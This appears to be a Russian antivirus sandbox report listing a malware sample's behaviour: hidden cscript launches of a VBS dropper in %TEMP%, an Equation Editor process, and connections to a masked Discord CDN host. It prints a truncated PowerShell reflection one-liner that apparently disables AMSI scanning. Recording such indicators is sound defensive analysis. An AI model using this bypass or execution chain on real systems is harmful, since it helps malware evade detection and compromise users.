Техническая информация
- '<SYSTEM32>\cscript.exe' %TEMP%\Client.vbs AC
- '<SYSTEM32>\cmd.exe' /C cscript %tmp%\Client.vbs AC
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...
- %TEMP%\client.vbs
- %TEMP%\client.vbs
- 'cd#.##scordapp.com':443
- 'cd#.##scordapp.com':443
- DNS ASK cd#.##scordapp.com
- '<SYSTEM32>\cmd.exe' /C cscript %tmp%\Client.vbs AC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValu...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding